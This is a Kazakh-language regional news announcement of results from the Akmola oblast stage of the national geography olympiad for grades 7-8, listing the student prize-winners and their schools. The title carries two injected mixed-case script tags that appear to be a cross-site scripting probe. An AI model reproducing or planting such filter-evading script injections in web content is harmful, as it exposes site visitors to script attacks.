7-8 сынып оқушылары арасында география пәнінен Ұлттық олимпиадасының облыстық кезеңін өткізу қорытындылары туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.10.2023

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығының ұйымдастырумен 2023 жылғы 26-28 қазан аралығында Сандықтау ауданының Сандықтау ауылында «Жас дәурен» жыл бойы балалар сауықтыру лагерінің базасында 7-8 сынып оқушылары арасында география пәнінен Ұлттық олимпиадасының облыстық кезеңі өткізілді.

Олимпиаданың мақсаты – географиялық білімнің, дағдылардың және географиялық зерттелерге белсенділігінің сапасына назар аудара отырып, оқушылардың пәнді тереңдетіп оқуға деген қызығушылығын арттыру.

Олимпиаданың міндеттері: географияны табиғат пен қоғамның дамуындағы кеңістіктік заңдылықтарды зерттейтін ғылым ретінде дәріптеу; дарынды және талантты әр оқушының өзін-өзі жетілдіру мақсатында географиялық зерттеулерге белсенді қызығушылықты ынталандыру; өңірлік, ұлттық және халықаралық ауқымдағы озық білім беру технологияларының платформасы ретінде география пәні бойынша Ұлттық олимпиаданың беделі мен мәртебесін арттыру; мектептің географиялық олимпиадалық қозғалысы үшін платформа құру; елдің «Тұрақты даму тұжырымдамасының» мақсаттарына жетуде географияның кең мүмкіндіктерін қамту және ашу; үздік әлемдік білім беру тәжірибелері арқылы олимпиадаларға қатысушылардың әлеуетін арттыру.

Олимпиадаға 17 ауданнан, Степногорск, Көкшетау және Қосшы қалаларынан және облыстық мамандандырылған мектеп-интернаттан облыстық кезеңге аудандық (қалалық) кезеңдерде іріктеуден өткен барлығы 100-ден аса оқушы қатысты.

Олимпиада қорытындысы бойынша 25 оқушы жүлдегер атанды: І-дәрежелі дипломмен – 4 оқушы, ІІ-дәрежелі дипломмен – 8 оқушы, ІІІ-дәрежелі дипломмен – 13 оқушы, грамотамен –7 оқушы марапатталды.

География пәнінен Ұлттық олимпиадасының облыстық кезеңінде І орын алған 4 оқушы республикалық кезеңге жолдама алды.

І-дәрежелі дипломмен марапатталды:

1.Муталяпова Алуа - Көкшетау қаласы әл-Фараби атындағы IT лицейінің 7-сынып оқушысы;

2. Домбровский Тимур - Бурабай ауданы, Қатаркөл ауылының Досов атындағы жалпы орта білім беретін мектебінің 7-сынып оқушысы;

3. Төлегенов Ерсұлтан - Көкшетау қаласы "Білім-инновация" лицей-интернатының 8-сынып оқушысы;

4. Едрисова Адина - Көкшетау қаласы техникалық лицейінің 8-сынып оқушысы.

ІІ-дәрежелі дипломмен марапатталды:

1.Адильбеков Нұрдаулет - Жақсы ауданы,  Жақсы ауылының  № 1 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

2.Қайрат Ерсұлтан - Астана қаласы №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернатының 7-сынып оқушысы;

3. Дмитриев Александр - Шортанды ауданы, Гуляй-поле негізгі орта мектебінің 7-сынып оқушысы;

4. Нурканова Милана - Щучинск қаласы "Білім-инновация" IT лицей-интернатының 7-сынып оқушысы;

5. Шаяхмет Дастан - Жарқайың ауданы, Далабай ауылының негізгі орта мектебінің 8-сынып оқушысы;

6. Кадралинова Амина - Щучинск қаласы "Білім-инновация" IT лицей-интернатының 8-сынып оқушысы;

7. Алтынхан Сардар - Аршалы ауданы, Жібек жолы ауылының мектеп – лицейінің 8-сынып оқушысы;

8. Никитюк Вадим - Бурабай ауданы, Щучинск қаласының Щучинск қаласының № 1 мектеп-гимназиясының 8-сынып оқушысы.

ІІІ-дәрежелі дипломмен марапатталды:

1. Сейітбек Еркебұлан - Жақсы ауданы, Алғабас ауылының негізгі орта мектебінің 7-сынып оқушысы;

2. Қапар Шыңғыс - Степногорск қаласы  Бестобе кентінің №2  жалпы орта білім беретін мектебінің 7-сынып оқушысы;

3. Мақсатұлы Аян - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 7-сынып оқушысы;

4. Бегежанова Диана - Атбасар ауданы, Бастау ауылының № 1 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

5. Куликов Артем - Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

6. Анарбеков Амир - Қосшы қаласы Бизнес академия "Дара" мектеп-лицейінің 7-сынып оқушысы;

7. Абылкасымов Айып - Астрахан ауданы, Новочеркасс ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы;

8. Шарипжан Айзере - Қорғалжын ауданы, Жантеке ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы;

9. Амангелді Диас - Көкшетау қаласы "Білім-инновация" лицей-интернатының 8-сынып оқушысы;

10. Батышев Адиль - Атбасар ауданы, Атбасар қаласының № 2 жалпы орта білім беретін  мектебінің 8-сынып оқушысы;

11. Шакубаев Жанкабыл - Бұланды ауданы, Партизанка ауылының жалпы орта білім беретін мектебінің 8 - сынып оқушысы;

12. Каргин Захар - Зеренді ауданы, Зеренді ауылының №2 жалпы орта білім беретін мектебінің 8-сынып оқушысы;

13. Шевнина Дарья - Есіл ауданы, Курский ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы.

Грамотамен марапатталды:

1. Мухара Нұрасыл - Атбасар ауданы, Мариновка ауылының № 2 жалпы орта білім беретін мектебінің 7-сынып оқушысы;

2. Смагулова Диана - Ақкөл ауданы, Ақкөл қаласының № 2 жалпы орта бiлiм беретiн мектебiнің 7-сынып оқушысы;

3. Сәбит Даниал - Степногорск қаласы, № 4 «Болашақ» облыстық мамандандырылған мектеп – лицей – интернатының 7-сынып оқушысы;

4. Дәулетхан Ғайникамал - Қосшы қаласы №3 жалпы орта білім беретін мектебінің 8-сынып оқушысы;

5. Темирова Алтынай - Шортанды ауданы, Шортанды кентінің №2 жалпы орта білім беретін мектебінің 8-сынып оқушысы;

6. Ргебай Әділ - Степногорск қаласы, № 4 «Болашақ» облыстық мамандандырылған мектеп – лицей – интернатының 8-сынып оқушысы;

7. Галаганов Кирилл - Жарқайың ауданы, Далабай ауылының негізгі орта мектебінің 8-сынып оқушысы.

         Олимпиада жеңімпаздары мен жүлдегерлерін құттықтаймыз! Табыс және алдағы уақытта жеңістер тілейміз!

Просмотров: 888


Пікір қосу



Деректерді қолтаңбаға қосу